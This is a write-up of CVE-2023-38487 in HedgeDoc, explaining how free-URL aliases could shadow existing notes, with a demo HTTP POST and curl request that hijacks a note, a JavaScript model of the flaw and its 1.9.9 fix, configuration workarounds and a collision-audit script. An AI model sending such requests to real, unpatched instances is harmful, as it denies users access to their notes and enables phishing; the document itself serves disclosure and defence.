CVE-2023-38487 - HedgeDoc “Note Hiding” Exploit—How Alias Collisions Can Block Access, Enable Phishing, and Denial of Service
Summary:
CVE-2023-38487 exposes a subtle but impactful vulnerability in HedgeDoc, the collaborative markdown note-taking tool. Before version 1.9.9, misuse of its freeURL feature allowed users to “hide” any note (with a known ID) simply by creating a new note whose alias matches the target note’s ID. This could deny access to the real note or be used to trick users with malicious content. Here’s a closer look—what’s going on, why it happens, how attackers exploit it, and how you can stop it.
What Is HedgeDoc?
HedgeDoc is an open-source markdown editor, focused on collaborative, real-time editing—think Google Docs for markdown. Notes are usually accessed by their unique “note ID,” but HedgeDoc lets you create easier-to-remember “aliases” for direct access, thanks to its optional *freeURL* mode.
FreeURL means you can create new notes by picking whatever alias you want (for example, /new/my-cool-alias). Before v1.9.9, however, this feature had a dangerous oversight.
When a user creates a new note in freeURL mode, they can choose any alias, and HedgeDoc did not check whether that alias matched the ID of an existing note. Suppose a note already exists with ID "abc123":
- The attacker creates a new note and picks "abc123" as its alias. Nothing stops them, because the check only covers aliases already in use, not note IDs.
- When someone visits /abc123, HedgeDoc resolves aliases before note IDs. It therefore serves the attacker's note, not the original.
Real-World Exploitation
- Denial of Service: nobody can reach the real note at its usual URL; every visitor sees the attacker's version instead.
- Phishing/Trickery: the attacker's note can carry lookalike content with modified links or attachments, and users trust it because the URL is the one they already know.
- Persistence: the original note is not deleted, only shadowed. Restoring from a backup does not help (the collision is in the live data), and editing at the usual URL now edits the attacker's note. Access only comes back once the colliding note or its alias is removed.
Warning: attackers need to know the ID of the note they want to target. HedgeDoc IDs are not guessable, but they are part of every shared link, so anyone who has ever received a link to the note has what they need.
Exploit—Step-by-Step Demo
Let's say we have an important document with ID secretnote. We want to block everyone from accessing it (or show a fake version).
1. Send a POST request to /new/secretnote. In freeURL mode this creates a new note whose alias is secretnote. HedgeDoc's note-creation endpoint takes the note body as raw markdown:
```http
POST /new/secretnote HTTP/1.1
Host: hedgedoc.example.com
Content-Type: text/markdown
[ ... session cookie if the instance requires login for freeURL notes ... ]

You have been hacked!
```
2. The same request with curl:
```bash
# Pass the session cookie with -b if the instance requires login for freeURL notes
curl -X POST "https://hedgedoc.example.com/new/secretnote" \
  -H "Content-Type: text/markdown" \
  --data-binary "You have been hacked!"
```
3. Now, visiting /secretnote brings up the attacker's note.
4. The original content of secretnote is still stored, but every lookup of /secretnote resolves the alias first, so there is no way to reach it from the web UI. Recovering it means going to the database directly or removing the colliding note.
Dangers & Impact
- Who can attack? If freeURL note creation is open to anonymous users, anyone on the internet can do this. If it requires authentication, only signed-in users can, which narrows the pool but does not remove the problem.
Patch & Mitigation
- Fixed: Released in HedgeDoc v1.9.9 (July 2023)
- How fixed? When a note is created with an alias, the app now checks whether that alias matches an existing note ID. If it does, the request is rejected:
```js
// Pseudocode for the check added in 1.9.9 (illustrative, not the project's code);
// noteExistsWithId is a placeholder for a lookup of an existing note by its ID
if (noteExistsWithId(alias)) {
  return HTTP_400_BAD_REQUEST;
}
```
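To make the lookup order and the 1.9.9 check concrete, here is an added example in JavaScript (HedgeDoc is a Node.js application). It is not HedgeDoc's own code: the in-memory store, the note objects and the function names are assumptions chosen for illustration. It models both the alias-before-ID resolution described under "What Is HedgeDoc?" above and the creation-time check the fix adds.

```javascript
// Added example, not HedgeDoc's own code: a minimal in-memory model of how a
// HedgeDoc 1.x URL path is resolved to a note, why a free-URL alias can shadow
// an existing note ID, and the creation-time check that 1.9.9 adds.
// The store, note objects and all function names here are illustrative.

// Constructed note table: each note has a server-generated ID (the value that
// appears in its URL) and an optional free-URL alias.
function makeStore() {
  return {
    notes: [
      { id: 'secretnote', alias: null, content: 'Q3 budget (original)' },
      { id: 'xK9pq2LmR', alias: 'team-wiki', content: 'Team wiki' },
    ],
  };
}

// Lookup order as the advisory describes it: aliases are consulted before IDs,
// so an alias equal to some other note's ID always wins.
function resolveNote(store, path) {
  const byAlias = store.notes.find((n) => n.alias === path);
  if (byAlias) return byAlias;
  return store.notes.find((n) => n.id === path) || null;
}

// Pre-1.9.9 behaviour: free-URL creation only refuses an alias that is already
// used as an alias; a collision with an existing note ID goes unnoticed.
function createNoteVulnerable(store, alias, content) {
  if (store.notes.some((n) => n.alias === alias)) {
    return { status: 409, note: null }; // alias already taken
  }
  const note = { id: 'generated-' + store.notes.length, alias, content };
  store.notes.push(note);
  return { status: 200, note };
}

// 1.9.9 behaviour as the page describes it: additionally reject an alias that
// matches an existing note ID, before anything is stored.
function createNoteFixed(store, alias, content) {
  if (store.notes.some((n) => n.id === alias)) {
    return { status: 400, note: null }; // alias collides with a note ID
  }
  return createNoteVulnerable(store, alias, content);
}

// Run the attack against one creation function and report what /secretnote
// serves before and after, plus whether the original note row still exists.
function demonstrate(createFn) {
  const store = makeStore();
  const before = resolveNote(store, 'secretnote').content;
  const { status } = createFn(store, 'secretnote', 'You have been hacked!');
  const after = resolveNote(store, 'secretnote').content;
  const originalStillStored = store.notes.some((n) => n.id === 'secretnote');
  return { status, before, after, originalStillStored };
}

console.log('vulnerable:', demonstrate(createNoteVulnerable));
console.log('fixed:     ', demonstrate(createNoteFixed));
```

Run it with node. The vulnerable path returns 200 and /secretnote now serves the attacker's content while the original row is still in the store, which is exactly the "hidden, not deleted" behaviour described above; the fixed path returns 400 and leaves resolution unchanged.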
Temporary Workarounds (older versions):
- Disable freeURL mode: set allowFreeURL to false in config.json (or CMD_ALLOW_FREEURL=false in the environment). This removes the attack surface entirely.
- If freeURL is needed, at least require login for it: set requireFreeURLAuthentication to true (or CMD_REQUIRE_FREEURL_AUTHENTICATION=true). This limits the attack to accounts you can identify, but does not prevent it.
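The fix only rejects new collisions at creation time; it says nothing about notes created before the upgrade, so after patching it is worth auditing the existing notes table. The following is an added example, not HedgeDoc's own tooling. It runs over rows in the shape of HedgeDoc 1.x's Notes table (id, shortid, alias; an assumption to verify against your schema) and flags any alias that equals another note's UUID, its short ID, or the base64url form of its UUID that HedgeDoc puts in editor URLs (the encoding function is my reconstruction and also an assumption). The sample rows are constructed.

```javascript
// Added example, not HedgeDoc's own code: audit a dump of the notes table for
// aliases that collide with another note's ID. The row shape (id, shortid,
// alias) follows HedgeDoc 1.x's Notes table and the base64url encoding of the
// UUID reproduces the form used in editor URLs; both are assumptions here, and
// the rows below are constructed test data.

// Assumption: HedgeDoc 1.x editor URLs carry the note UUID as the unpadded
// base64url encoding of its 16 raw bytes. Check this against your instance.
function encodeNoteId(uuid) {
  return Buffer.from(uuid.replace(/-/g, ''), 'hex').toString('base64url');
}

// Every URL form under which a note can be reached by ID rather than by alias.
function idForms(note) {
  return [note.id, note.shortid, encodeNoteId(note.id)];
}

// Return one record per alias that shadows a different note's ID.
function findAliasCollisions(rows) {
  const byForm = new Map();
  for (const row of rows) {
    for (const form of idForms(row)) byForm.set(form, row);
  }
  const collisions = [];
  for (const row of rows) {
    if (!row.alias) continue;
    const shadowed = byForm.get(row.alias);
    if (shadowed && shadowed.id !== row.id) {
      collisions.push({
        alias: row.alias,
        shadowingNote: row.id,
        shadowedNote: shadowed.id,
      });
    }
  }
  return collisions;
}

// Constructed sample rows: one legitimate alias, one alias equal to another
// note's short ID, and one alias equal to another note's base64url-encoded UUID.
const SAMPLE_ROWS = [
  { id: '11111111-1111-4111-8111-111111111111', shortid: 'S1abcdefg', alias: 'team-wiki' },
  { id: '22222222-2222-4222-8222-222222222222', shortid: 'S2hijklmn', alias: null },
  { id: '33333333-3333-4333-8333-333333333333', shortid: 'S3opqrstu', alias: 'S2hijklmn' },
  {
    id: '44444444-4444-4444-8444-444444444444',
    shortid: 'S4vwxyzab',
    alias: encodeNoteId('11111111-1111-4111-8111-111111111111'),
  },
];

console.log(findAliasCollisions(SAMPLE_ROWS));
```

Feed it the rows of your notes table (for HedgeDoc 1.x that is SELECT id, shortid, alias FROM "Notes", again assuming the default schema) and delete or re-alias every note reported as shadowingNote; the shadowed note becomes reachable again as soon as the colliding alias is gone.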
References
- GitHub Security Advisory: GHSA-37jr-j9c3-w2f2
- HedgeDoc release v1.9.9
- CVE-2023-38487 on MITRE
Conclusion
CVE-2023-38487 is a classic example of how “minor” logic bugs—like not checking for alias collisions—can have serious consequences, from stealthy DoS to social engineering attacks. If you use HedgeDoc, update to v1.9.9 or later now, and review your freeURL settings! If you run an open instance, consider restricting note creation to trusted users.
Stay secure, and don’t let your notes get hijacked!
Timeline
Published on: 08/04/2023 16:15:00 UTC
Last modified on: 08/10/2023 16:55:00 UTC